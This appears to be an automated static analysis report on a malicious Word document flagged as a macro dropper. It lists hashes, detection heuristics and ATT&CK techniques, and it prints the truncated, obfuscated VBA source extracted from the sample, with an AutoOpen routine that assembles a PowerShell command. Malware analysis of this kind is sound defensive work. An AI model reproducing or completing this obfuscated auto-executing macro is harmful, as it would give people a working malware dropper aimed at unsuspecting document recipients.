Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3817f51e7ed26dd8…

MALICIOUS

Office (OLE)

133.5 KB Created: 2018-02-13 20:05:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: 49c5077d82b42f904278e32aad2d0874 SHA-1: f64f942ea887336a4a14cc0a4e4489fc28764c70 SHA-256: 3817f51e7ed26dd8e620b23345d7debfbb6cd1a072cb00f2986acb417d73a853
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function and Application.Run to execute arbitrary code, indicating it's designed to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6448022-0' further supports its role as a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6448022-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6448022-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 25088 bytes
SHA-256: ee6dd68907c1a9bb5a7e8a4777911dbd6afc70d6f53c44aca1fc443e2ddee9bc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ulbBrLvSFZSi"
Sub AutoOpen()
On Error Resume Next
CUAiHFANr = (ZSMvGFdb - Int(EPIjtuNTsDMJ) * brjpZLwR / Oct(YSTJjsNDQ) - (PzIJ - Sin(8854580)))
kHntmIKfM = (qVP - Int(fSfYbqq) * jLUFom / Oct(uWSh) - (ESXCfUNnHFs - Sin(4565815)))
wllnkahSD = (XbZhTYY - Int(hXndNNu) * tGdCIiTwG / Oct(BTJ) - (lOijuwdwApOpX - Sin(3950705)))
Application.Run "TrfpvFH", GsaIIiAAFIQ
jUYXtIhap = (LsI - Int(aQXFImmZu) * SzwvGonTH / Oct(MlidaBNKYhYBoA) - (kSJjliKa - Sin(9126625)))
EvJmUBNrl = (Qoltf - Int(YbAN) * RJwX / Oct(VinWQCLj) - (irbqXTjP - Sin(6018544)))
jjwYiYMGK = (qnlLP - Int(fiEPsOcCUAPwld) * YBiOnXzAPJKsz / Oct(lsjMrrlbAnVHv) - (dIPU - Sin(6311423)))
End Sub
Function GsaIIiAAFIQ()
On Error Resume Next
OiYqXdiRu = (KmMaKm - Int(iEUcj) * SKXhIUJ / Oct(RzwuMZTL) - (JcvWzJLrhbUNDr - Sin(2615805)))
mYNKXVXHiSr = (wcn - Int(FrGPutpQfzM) * SGLzlzVALpas / Oct(IOFiqQwfZsRW) - (bETvLkOduw - Sin(6161823)))
NSLnXEprww = (RwHmaP - Int(NZlfjh) * jPKsNtdFXRjQ / Oct(piLNRZUYU) - (tzdAIGpZkNXE - Sin(9824871)))
dDRCVElk = TmHvYRs + Mid(irHLqk + "sjKifovbmwtHIcHjIBq73+q73n+uBnt'+'hkt(10000,thk+tuBn+uBnhk 2821uBn+uBn33)thk+thk;thk+thkf1thk+thkhuBn+uBnAthk+thkDCthk+thuBn+uBnkXthk+thk = ythkq73+q73+thkxthut" + vzJmzbY, 18, 141)
TqwULH = (wCGlirLhnkMuz - Int(prYZrRLbBHrY) * Jzt / Oct(NrwJHf) - (EXNjWcDRbdDs - Sin(3874484)))
DbaIwlBta = (HPhVBztGpChtU - Int(CAdhMiVUEiEZDa) * YFHZVGcRoGfwwi / Oct(wcHFO) - (zVflZmLCQ - Sin(5373217)))
MaSTKtzK = (TIQwaUwrajpbjl - Int(mtfcRwLX) * jbnvUQOX / Oct(jdpROXIJNn) - (KuwACzSWnKzH - Sin(7250714)))
CtYTDqnWBiV = CjmkMZqFKl + Mid(jOYOJMPMa + "pMJquzDCWWQHZUYMQMbYJSyxJthk,['+'cHar]39-crEPlu'+'Bn+u'+'Bnace ([cHar]'+'102+[cHar]49+[cq73+q7cZFdQfwIb" + tjsUwh, 23, 72)
FwArokdmw = (dWszBsVinOTC - Int(jFdYWs) * DMchd / Oct(ldvij) - (CuuJVravXpJdQ - Sin(3388784)))
qqWoZpB = (mwwbCjvm - Int(tLTqGr) * JfbzSovIjvz / Oct(NDzQLnwfwCh) - (HHiQ - Sin(1957724)))
VQpDNcQfmZ = (kofFzzpS - Int(wCov) * mIZN / Oct(uHDILkHwSsKKf) - (ILIHIDBbthAdKH - Sin(5102635)))
OsRMkCfZcA = NzjDXKURzzHhU + Mid(HUIkXjOocn + "sXuwrPbtOBjopXwYOOSAqreq73,[chAR]36  -RePlACE  ([chAR]80+[chAR]90+[chAR]115),[chAR]124))').ReplAce(([cHaR]117+[cHaR]104+[cHaR]66),[stRING][cHaR]36).ReplAce('q73',[stRING][cHaR]39) ) YiwzqiDY" + UzskTlWDZAYcF, 23, 160)
wtXPKcws = (sicnnLBFUm - Int(FUUfs) * RHdwCLYlurbZjS / Oct(OHtRBOdwqNtjw) - (FfsEwKkfl - Sin(8106397)))
PkOPJ = (EBtTafo - Int(QqMaOqj) * JmiIbcHoLjVj / Oct(KjVD) - (zMjfQiFPfmtFiN - Sin(2504696)))
CiqipVU = (bsDhrbt - Int(HrKE) * FHqWP / Oct(WFdWACMwVvGEH) - (mjrSVHVS - Sin(5975198)))
hFQwz = wiRWPQhjTU + Mid(zWZuoXqmvdBQJ + "uioiCyxJtq73+q73hk+thkeyxJ+thk+thkytq73+q73hk+tq73+q73hkxJ'+'thk+thkw-obj'+'ecq73+q73yxJ+yxJthk+uBn+uBnthktyxthk+thkJthk+t'+'hk) rthk+thkathk+thkndothk+uBn+uq73+q73Bq'+'73+q73ntsLjcOWbRm" + TOVIiaAXwtcsI, 6, 172)
lZNpLHr = (cAIWrtYpnjVkVO - Int(cpuWXmVUdDOi) * GvmqsYbfVJ / Oct(PbwOADlvJK) - (iJDhKGffSc - Sin(2967450)))
kSmoXw = (jrufswnLHjNGw - Int(GUaSTUWaNcmL) * UzqqEz / Oct(NWGYtwWzYBv) - (lVzLFAJuVIiRsh - Sin(6599239)))
RjEjfhmwNO = (LQpJGMb - Int(OBYUwXCMjpZ) * UolquFOEspfMQ / Oct(nIM) - (qYtQwDbowzG - Sin(3467424)))
asfpnRTmfC = ZYBDaiCiOU + Mid(QwWDfifYIAmC + "BvlPThFNNEUVbEERGathk+thkuBn+q73+q73uBniwYthk+thkANgY1o(), f1hthk+thkSthk+thkDtq73+q73hk+thq73+q73kCthk+thk'+')q73+q73;thq73+q73k+thk&(yxthk+tq73+q73DWXlpzu" + ZWQYAIYEaF, 19, 131)
ZLDwlHKn = (FQcMYoaVZ - Int(hPkBOMRq) * Fqs / Oct(zkIthZQUtH) - (pTRnVLbdf - Sin(3783001)))
DCdCuOlh = (zVH - Int(kIO) * wkNkfbQv / Oct(wJDnHHMuviUsi) - (NMwlml - Sin(6049270)))
OMXWoZVwdp = (HFUItcjlLFQj - Int(WQNrOvHoiu) * UXzYjqdJMG / Oct(zTz) - (jLKSOc - Sin(9153912)))
WFWuSlkPk = DHpzXfzOBwXq + Mid(WMEvjuAu + "wbwawEzHJzwzAmQTXYwhk)uBnq73+q'+'73).REplaCe(uBnthkuBn,[sTrIng][CHa'+'r]39).REplaCe(uBn76Gq73+q73uBn,[sTrq73+q73
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.